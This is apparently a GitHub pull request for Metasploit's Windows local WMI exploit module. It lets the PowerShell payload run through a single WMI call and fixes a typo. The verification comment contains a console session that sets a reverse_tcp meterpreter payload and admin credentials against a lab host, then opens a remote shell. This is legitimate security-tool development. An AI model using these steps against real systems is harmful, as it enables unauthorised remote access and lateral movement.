
WMIC ExtAPI Improvements #4316

Merged: 3 commits merged into rapid7:master on Jan 16, 2015

Conversation

Meatballs1 (Contributor)

With the WMI calls available in ExtAPI, we no longer need to stage the PowerShell payload in the environment variables; we can do a single call to execute it.

Also fixes an issue in Msf::Core::Post::WMIC which called starts_with instead of starts_with?

Resolves: #4308

Verification

@busterb (Member)

busterb commented Jan 16, 2015

Cool, seems to work for me:

msf exploit(handler) > use exploit/windows/local/wmi 
msf exploit(wmi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(wmi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(wmi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(wmi) > set SESSION 1
SESSION => 1
msf exploit(wmi) > set rhosts 192.168.56.2
rhosts => 192.168.56.2
msf exploit(wmi) > run

[*] Started reverse handler on 192.168.56.1:4444 
[*] [192.168.56.2] Executing payload
[+] [192.168.56.2] Process Started PID: 1056
[*] Sending stage (770048 bytes) to 192.168.56.2

meterpreter > sysinfo
Computer        : WIN-2BJK4SPOGFL
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

@bcook-r7 bcook-r7 merged commit e471271 into rapid7:master Jan 16, 2015
bcook-r7 pushed a commit that referenced this pull request Jan 16, 2015
…dows/local/wmi

also fixes a typo bug in WMIC
@Meatballs1 (Contributor, Author)

Cheers ears

Successfully merging this pull request may close these issues.

Exploit Windows Local WMI Improvements